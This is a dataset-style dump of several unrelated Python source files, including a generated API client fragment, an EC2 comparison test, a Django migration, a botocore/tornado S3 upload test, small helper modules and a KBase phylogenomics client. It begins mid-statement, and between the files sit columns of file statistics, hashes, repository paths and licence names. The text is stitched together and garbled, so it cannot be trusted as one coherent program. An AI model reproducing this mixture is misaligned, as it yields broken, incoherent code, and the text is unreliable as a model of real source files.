required parameter `id` when calling `job_residuals_read`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] if 'variables' in local_var_params and local_var_params['variables'] is not None: # noqa: E501 query_params.append(('variables', local_var_params['variables'])) # noqa: E501 collection_formats['variables'] = 'csv' # noqa: E501 header_params = {} 
form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/residuals/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobResidual', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth'))
43.504695
362
0.582421
6,215
55,599
4.973612
0.043604
0.040115
0.06069
0.031445
0.963961
0.961049
0.9583
0.956844
0.949727
0.939989
0
0.013871
0.345168
55,599
1,277
363
43.538763
0.835146
0.492491
0
0.760512
0
0
0.159073
0.024671
0
0
0
0
0
1
0.034735
false
0
0.009141
0
0.078611
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c37ffdee531e1ec54923ad65f40a2a035de352e1
361
py
Python
tests/internal/virtualization/test_virtualization_hvm_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/virtualization/test_virtualization_hvm_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/virtualization/test_virtualization_hvm_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
# Testing module virtualization.hvm import pytest import ec2_compare.internal.virtualization.hvm def test_get_internal_data_virtualization_hvm_get_instances_list(): assert len(ec2_compare.internal.virtualization.hvm.get_instances_list()) > 0 def test_get_internal_data_virtualization_hvm_get(): assert len(ec2_compare.internal.virtualization.hvm.get) > 0
36.1
78
0.853186
50
361
5.78
0.36
0.352941
0.276817
0.33218
0.82699
0.615917
0.615917
0.615917
0
0
0
0.014925
0.072022
361
9
79
40.111111
0.847761
0.091413
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
0
0
0
null
1
1
1
1
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
9
6f13fb036aac286606bee5210004bb045b921583
2,242
py
Python
main/migrations/0004_auto_20201119_2103.py
vestial/vision-video-analyzer
f5c5f9c0f0522008e86641648fd1591507ca8f6b
[ "MIT" ]
1
2020-10-30T00:49:21.000Z
2020-10-30T00:49:21.000Z
main/migrations/0004_auto_20201119_2103.py
vestial/vision-video-analyzer
f5c5f9c0f0522008e86641648fd1591507ca8f6b
[ "MIT" ]
null
null
null
main/migrations/0004_auto_20201119_2103.py
vestial/vision-video-analyzer
f5c5f9c0f0522008e86641648fd1591507ca8f6b
[ "MIT" ]
null
null
null
# Generated by Django 3.1.2 on 2020-11-19 21:03 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('main', '0003_auto_20201119_2033'), ] operations = [ migrations.AddField( model_name='video', name='bit_depth_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='bit_rate_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='frame_rate_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='resolution_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='sample_rate_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='shutter_speed_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='video_length_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), ]
35.587302
74
0.477252
168
2,242
6.232143
0.285714
0.068768
0.153773
0.180516
0.812798
0.812798
0.812798
0.772684
0.772684
0.772684
0
0.02439
0.433095
2,242
62
75
36.16129
0.799371
0.020071
0
0.75
1
0
0.198633
0.091572
0
0
0
0
0
1
0
false
0
0.017857
0
0.071429
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
6f20ba6ab90d7e54c6e8178db55cde079d25f9a9
4,643
py
Python
test.py
ezotrank/botocore-tornado
ec3110830494c52cde923934c02ccb2ff37d6a83
[ "MIT" ]
null
null
null
test.py
ezotrank/botocore-tornado
ec3110830494c52cde923934c02ccb2ff37d6a83
[ "MIT" ]
null
null
null
test.py
ezotrank/botocore-tornado
ec3110830494c52cde923934c02ccb2ff37d6a83
[ "MIT" ]
1
2021-11-03T10:46:54.000Z
2021-11-03T10:46:54.000Z
import botocore_tornado.session import botocore.session from tornado import gen from tornado.ioloop import IOLoop bucket = 'botocore-tornado-test' # change this to your bucket name key = 'xyzzy' # a subfolder under the bucket filename = 'testfile.txt' # the file we will put into S3 region = 'us-east-1' # change this to your region acl = 'public-read' # we are going to set the ACL to public-read so we can access the file via a url @gen.coroutine def main_async(): session = botocore_tornado.session.get_session() session.set_debug_logger() session.set_debug_logger('botocore_tornado') s3 = session.get_service('s3') endpoint = s3.get_endpoint(region) print "=========================" print "====== ASYNC TEST =======" print "=========================" print print "uploading the file to s3" fp = open('./' + filename, 'rb') operation = s3.get_operation('PutObject') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename, body=fp) print http_response print response_data print print "getting s3 object properties of file we just uploaded" operation = s3.get_operation('GetObjectAcl') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data print print "setting the acl to public-read" operation = s3.get_operation('PutObjectAcl') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename, acl=acl) print http_response print response_data print print "The url of the object is:" print print 'http://'+bucket+'.s3.amazonaws.com/' + key + '/' + filename operation = s3.get_operation('DeleteObject') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data def main_sync(): session = botocore.session.get_session() session.set_debug_logger() s3 = session.get_service('s3') endpoint = s3.get_endpoint(region) print 
"=========================" print "====== SYNC TEST ========" print "=========================" print print "uploading the file to s3" fp = open('./' + filename, 'rb') operation = s3.get_operation('PutObject') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename, body=fp) print http_response print response_data print print "getting s3 object properties of file we just uploaded" operation = s3.get_operation('GetObjectAcl') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data print print "setting the acl to public-read" operation = s3.get_operation('PutObjectAcl') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename, acl=acl) print http_response print response_data print print "The url of the object is:" print print 'http://'+bucket+'.s3.amazonaws.com/' + key + '/' + filename operation = s3.get_operation('DeleteObject') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data if __name__ == '__main__': with open(filename, 'w') as f: f.write("botocore tornado upload test file") IOLoop.instance().run_sync(main_async) main_sync()
38.691667
101
0.518199
451
4,643
5.184035
0.197339
0.082121
0.047904
0.0787
0.772455
0.764756
0.764756
0.73225
0.73225
0.73225
0
0.007597
0.376265
4,643
119
102
39.016807
0.799724
0.041999
0
0.792453
0
0
0.155786
0.02724
0
0
0
0
0
0
null
null
0
0.037736
null
null
0.396226
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
7
6f3b642010b53076efeab783795f90c90092c5bf
284
py
Python
common/elasticsearch/elasticsearch_client/__init__.py
KentWangYQ/mongo2es
8952640e8ac3f2b1aa6845082fce04b7c4f7bd1e
[ "Apache-2.0" ]
5
2018-12-24T10:45:56.000Z
2019-07-29T07:26:28.000Z
common/elasticsearch/elasticsearch_client/__init__.py
KentWangYQ/mongo2es
8952640e8ac3f2b1aa6845082fce04b7c4f7bd1e
[ "Apache-2.0" ]
null
null
null
common/elasticsearch/elasticsearch_client/__init__.py
KentWangYQ/mongo2es
8952640e8ac3f2b1aa6845082fce04b7c4f7bd1e
[ "Apache-2.0" ]
2
2019-07-30T06:27:49.000Z
2021-09-24T08:21:52.000Z
# -*- coding: utf-8 -*- __all__ = ['elasticsearch_client', 'elasticsearch_direct_client', 'elasticsearch_2_redis_client', 'elasticsearch_2_kafka_client'] import elasticsearch_client, elasticsearch_direct_client, elasticsearch_2_redis_client, elasticsearch_2_kafka_client
40.571429
116
0.806338
31
284
6.677419
0.354839
0.550725
0.386473
0.36715
0.908213
0.908213
0.908213
0.908213
0.908213
0.908213
0
0.019608
0.102113
284
6
117
47.333333
0.792157
0.073944
0
0
0
0
0.394636
0.318008
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
1
1
1
1
1
1
1
1
1
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
11
6f463eaef344a54e68e85b5ee6da693121b5eb02
213
py
Python
hdlConvertorAst/to/hwt/utils.py
mewais/hdlConvertorAst
64c8c1deee923ffae17e70e0fb1ad763cb69608c
[ "MIT" ]
null
null
null
hdlConvertorAst/to/hwt/utils.py
mewais/hdlConvertorAst
64c8c1deee923ffae17e70e0fb1ad763cb69608c
[ "MIT" ]
null
null
null
hdlConvertorAst/to/hwt/utils.py
mewais/hdlConvertorAst
64c8c1deee923ffae17e70e0fb1ad763cb69608c
[ "MIT" ]
null
null
null
from hdlConvertorAst.to.basic_hdl_sim_model.utils import BitsT as bsm_BitsT def BitsT(width, is_signed=False, bits_cls_name="Bits"): return bsm_BitsT(width, is_signed=is_signed, bits_cls_name=bits_cls_name)
35.5
77
0.821596
37
213
4.351351
0.567568
0.149068
0.204969
0.223602
0
0
0
0
0
0
0
0
0.093897
213
5
78
42.6
0.834197
0
0
0
0
0
0.018779
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
6f5761a695dbb09ff41d1f76ee14b9a6c648f0d4
109
py
Python
error.py
Tod80077/Recommendation-System-2.0
85f6f98345f4279c28842c23b2a07aa1340ba561
[ "MIT" ]
null
null
null
error.py
Tod80077/Recommendation-System-2.0
85f6f98345f4279c28842c23b2a07aa1340ba561
[ "MIT" ]
null
null
null
error.py
Tod80077/Recommendation-System-2.0
85f6f98345f4279c28842c23b2a07aa1340ba561
[ "MIT" ]
null
null
null
import numpy as np def rmse(predictions, targets): return np.sqrt(((predictions - targets) ** 2).mean())
27.25
57
0.688073
15
109
5
0.8
0.48
0
0
0
0
0
0
0
0
0
0.01087
0.155963
109
4
57
27.25
0.804348
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
6f6de1614156ef735016d159e753401410cc77b7
28,918
py
Python
lib/kb_phylogenomics/kb_phylogenomicsClient.py
dcchivian/kb_phylogenomics
c63bae0dbe54b6d1e01107476e8f1b425acb11c5
[ "MIT" ]
1
2020-12-04T08:10:37.000Z
2020-12-04T08:10:37.000Z
lib/kb_phylogenomics/kb_phylogenomicsClient.py
dcchivian/kb_phylogenomics
c63bae0dbe54b6d1e01107476e8f1b425acb11c5
[ "MIT" ]
30
2017-03-22T00:19:05.000Z
2020-11-11T05:37:49.000Z
lib/kb_phylogenomics/kb_phylogenomicsClient.py
dcchivian/kb_phylogenomics
c63bae0dbe54b6d1e01107476e8f1b425acb11c5
[ "MIT" ]
11
2017-02-18T00:59:54.000Z
2020-08-20T22:47:38.000Z
# -*- coding: utf-8 -*- ############################################################ # # Autogenerated by the KBase type compiler - # any changes made here will be overwritten # ############################################################ from __future__ import print_function # the following is a hack to get the baseclient to import whether we're in a # package or not. This makes pep8 unhappy hence the annotations. try: # baseclient and this client are in a package from .baseclient import BaseClient as _BaseClient # @UnusedImport except ImportError: # no they aren't from baseclient import BaseClient as _BaseClient # @Reimport class kb_phylogenomics(object): def __init__( self, url=None, timeout=30 * 60, user_id=None, password=None, token=None, ignore_authrc=False, trust_all_ssl_certificates=False, auth_svc='https://ci.kbase.us/services/auth/api/legacy/KBase/Sessions/Login'): if url is None: raise ValueError('A url is required') self._service_ver = None self._client = _BaseClient( url, timeout=timeout, user_id=user_id, password=password, token=token, ignore_authrc=ignore_authrc, trust_all_ssl_certificates=trust_all_ssl_certificates, auth_svc=auth_svc) def build_gene_tree(self, params, context=None): """ :param params: instance of type "build_gene_tree_Input" (build_gene_tree() ** ** build a gene tree for a featureset) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "desc" of String, parameter "input_featureSet_ref" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "genome_disp_name_config" of String, parameter "skip_trimming" of type "bool", parameter "muscle_maxiters" of Long, parameter "muscle_maxhours" of Double, parameter "gblocks_trim_level" of Long, parameter "gblocks_min_seqs_for_conserved" of Long, parameter "gblocks_min_seqs_for_flank" of Long, parameter "gblocks_max_pos_contig_nonconserved" of Long, parameter "gblocks_min_block_len" of Long, parameter 
"gblocks_remove_mask_positions_flag" of Long, parameter "fasttree_fastest" of Long, parameter "fasttree_pseudo" of Long, parameter "fasttree_gtr" of Long, parameter "fasttree_wag" of Long, parameter "fasttree_noml" of Long, parameter "fasttree_nome" of Long, parameter "fasttree_cat" of Long, parameter "fasttree_nocat" of Long, parameter "fasttree_gamma" of Long :returns: instance of type "build_gene_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.build_gene_tree', [params], self._service_ver, context) def build_strain_tree(self, params, context=None): """ :param params: instance of type "build_strain_tree_Input" (build_strain_tree() ** ** build a species tree for a collection of strain genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "desc" of String, parameter "input_genome_refs" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "genome_disp_name_config" of String, parameter "skip_trimming" of type "bool", parameter "muscle_maxiters" of Long, parameter "muscle_maxhours" of Double, parameter "gblocks_trim_level" of Long, parameter "gblocks_min_seqs_for_conserved" of Long, parameter "gblocks_min_seqs_for_flank" of Long, parameter "gblocks_max_pos_contig_nonconserved" of Long, parameter "gblocks_min_block_len" of Long, parameter "gblocks_remove_mask_positions_flag" of Long, parameter "fasttree_fastest" of Long, parameter "fasttree_pseudo" of Long, parameter "fasttree_gtr" of Long, parameter "fasttree_wag" of Long, parameter "fasttree_noml" of Long, parameter "fasttree_nome" of Long, parameter "fasttree_cat" of Long, parameter "fasttree_nocat" of Long, parameter "fasttree_gamma" of Long :returns: instance of type "build_strain_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return 
self._client.call_method('kb_phylogenomics.build_strain_tree', [params], self._service_ver, context) def build_pangenome_species_tree(self, params, context=None): """ :param params: instance of type "build_pangenome_species_tree_Input" (build_pangenome_species_tree() ** ** build a species tree using the single copy genes from a pangenome) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "desc" of String, parameter "input_pangenome_ref" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "genome_disp_name_config" of String, parameter "skip_trimming" of type "bool", parameter "perc_marker_presence_min" of Double, parameter "muscle_maxiters" of Long, parameter "muscle_maxhours" of Double, parameter "gblocks_trim_level" of Long, parameter "gblocks_min_seqs_for_conserved" of Long, parameter "gblocks_min_seqs_for_flank" of Long, parameter "gblocks_max_pos_contig_nonconserved" of Long, parameter "gblocks_min_block_len" of Long, parameter "gblocks_remove_mask_positions_flag" of Long, parameter "fasttree_fastest" of Long, parameter "fasttree_pseudo" of Long, parameter "fasttree_gtr" of Long, parameter "fasttree_wag" of Long, parameter "fasttree_noml" of Long, parameter "fasttree_nome" of Long, parameter "fasttree_cat" of Long, parameter "fasttree_nocat" of Long, parameter "fasttree_gamma" of Long :returns: instance of type "build_pangenome_species_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.build_pangenome_species_tree', [params], self._service_ver, context) def view_tree(self, params, context=None): """ :param params: instance of type "view_tree_Input" (view_tree() ** ** show a KBase Tree and make newick and images downloadable) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_tree_ref" of type "data_obj_ref", parameter "desc" of String, 
parameter "show_skeleton_genome_sci_name" of type "bool", parameter "reference_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "skeleton_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user2_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "color_for_reference_genomes" of String, parameter "color_for_skeleton_genomes" of String, parameter "color_for_user_genomes" of String, parameter "color_for_user2_genomes" of String, parameter "tree_shape" of String :returns: instance of type "view_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_tree', [params], self._service_ver, context) def trim_speciestree_to_genomeset(self, params, context=None): """ :param params: instance of type "trim_speciestree_to_genomeset_Input" (trim_speciestree_to_genomeset() ** ** reduce tree to match genomes found in genomeset) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "input_tree_ref" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "desc" of String, parameter "show_skeleton_genome_sci_name" of type "bool", parameter "enforce_genome_version_match" of type "bool", parameter "reference_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "skeleton_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user2_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "color_for_reference_genomes" of String, 
parameter "color_for_skeleton_genomes" of String, parameter "color_for_user_genomes" of String, parameter "color_for_user2_genomes" of String, parameter "tree_shape" of String :returns: instance of type "trim_speciestree_to_genomeset_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.trim_speciestree_to_genomeset', [params], self._service_ver, context) def build_microbial_speciestree(self, params, context=None): """ :param params: instance of type "build_microbial_speciestree_Input" (build_microbial_speciestree() ** ** run Insert Set of Genomes into Species Tree with extra features) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_refs" of type "data_obj_ref", parameter "input_genome2_refs" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "desc" of String, parameter "show_skeleton_genome_sci_name" of type "bool", parameter "skeleton_set" of String, parameter "color_for_skeleton_genomes" of String, parameter "color_for_user_genomes" of String, parameter "color_for_user2_genomes" of String :returns: instance of type "build_microbial_speciestree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.build_microbial_speciestree', [params], self._service_ver, context) def localize_DomainAnnotations(self, params, context=None): """ :param params: instance of type "localize_DomainAnnotations_Input" (localize_DomainAnnotations() ** ** point all DomainAnnotations at local copies of Genome Objects) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_DomainAnnotation_refs" of type "data_obj_ref" :returns: instance of type "localize_DomainAnnotations_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return 
self._client.call_method('kb_phylogenomics.localize_DomainAnnotations', [params], self._service_ver, context) def run_DomainAnnotation_Sets(self, params, context=None): """ :param params: instance of type "run_DomainAnnotation_Sets_Input" (run_DomainAnnotation_Sets() ** ** run the DomainAnnotation App against a GenomeSet) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "override_annot" of type "bool" :returns: instance of type "run_DomainAnnotation_Sets_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.run_DomainAnnotation_Sets', [params], self._service_ver, context) def view_fxn_profile(self, params, context=None): """ :param params: instance of type "view_fxn_profile_Input" (view_fxn_profile() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, 
parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "view_fxn_profile_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_fxn_profile', [params], self._service_ver, context) def view_fxn_profile_featureSet(self, params, context=None): """ :param params: instance of type "view_fxn_profile_featureSet_Input" (view_fxn_profile_featureSet() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_featureSet_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "view_fxn_profile_featureSet_Output" -> structure: parameter "report_name" of String, 
parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_fxn_profile_featureSet', [params], self._service_ver, context) def view_fxn_profile_phylo(self, params, context=None): """ :param params: instance of type "view_fxn_profile_phylo_Input" (view_fxn_profile_phylo() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes using the species tree) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_speciesTree_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "view_fxn_profile_phylo_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_fxn_profile_phylo', [params], self._service_ver, context) def view_genome_circle_plot(self, params, context=None): """ :param params: instance of type "view_genome_circle_plot_Input" 
(view_genome_circle_plot() ** ** build a circle plot of a microbial genome) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref" :returns: instance of type "view_genome_circle_plot_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_genome_circle_plot', [params], self._service_ver, context) def view_pan_circle_plot(self, params, context=None): """ :param params: instance of type "view_pan_circle_plot_Input" (view_pan_circle_plot() ** ** build a circle plot of a microbial genome with its pangenome members) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref", parameter "input_compare_genome_refs" of type "data_obj_ref", parameter "input_outgroup_genome_refs" of type "data_obj_ref", parameter "save_featuresets" of type "bool", parameter "genome_disp_name_config" of String :returns: instance of type "view_pan_circle_plot_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_circle_plot', [params], self._service_ver, context) def view_pan_accumulation_plot(self, params, context=None): """ :param params: instance of type "view_pan_accumulation_plot_Input" (view_pan_accumulation_plot() ** ** build an accumulation plot of a pangenome) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref" :returns: instance of type "view_pan_accumulation_plot_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_accumulation_plot', [params], 
self._service_ver, context) def view_pan_flower_venn(self, params, context=None): """ :param params: instance of type "view_pan_flower_venn_Input" (view_pan_flower_venn() ** ** build a multi-member pangenome flower venn diagram) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref" :returns: instance of type "view_pan_flower_venn_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_flower_venn', [params], self._service_ver, context) def view_pan_pairwise_overlap(self, params, context=None): """ :param params: instance of type "view_pan_pairwise_overlap_Input" (view_pan_pairwise_overlap() ** ** build a multi-member pangenome pairwise overlap plot) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref" :returns: instance of type "view_pan_pairwise_overlap_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_pairwise_overlap', [params], self._service_ver, context) def view_pan_phylo(self, params, context=None): """ :param params: instance of type "view_pan_phylo_Input" (view_pan_phylo() ** ** show the pangenome accumulation using a tree) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_pangenome_ref" of type "data_obj_ref", parameter "input_speciesTree_ref" of type "data_obj_ref", parameter "save_featuresets" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool", parameter "genome_disp_name_config" of String :returns: instance of type "view_pan_phylo_Output" -> structure: parameter 
"report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_phylo', [params], self._service_ver, context) def find_homologs_with_genome_context(self, params, context=None): """ :param params: instance of type "find_homologs_with_genome_context_Input" (find_homologs_with_genome_context() ** ** show homolgous genes across multiple genomes within genome context against species tree) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_featureSet_ref" of type "data_obj_ref", parameter "input_speciesTree_ref" of type "data_obj_ref", parameter "save_per_genome_featureSets" of type "bool", parameter "neighbor_thresh" of Long, parameter "ident_thresh" of Double, parameter "overlap_fraction" of Double, parameter "e_value" of Double, parameter "bitscore" of Double, parameter "color_seed" of Double :returns: instance of type "find_homologs_with_genome_context_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.find_homologs_with_genome_context', [params], self._service_ver, context) def get_configure_categories(self, params, context=None): """ :param params: instance of type "get_configure_categories_Input" (get_configure_categories() ** ** configure the domain categorie names and descriptions) -> structure: parameter "params" of type "view_fxn_profile_Input" (view_fxn_profile() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of 
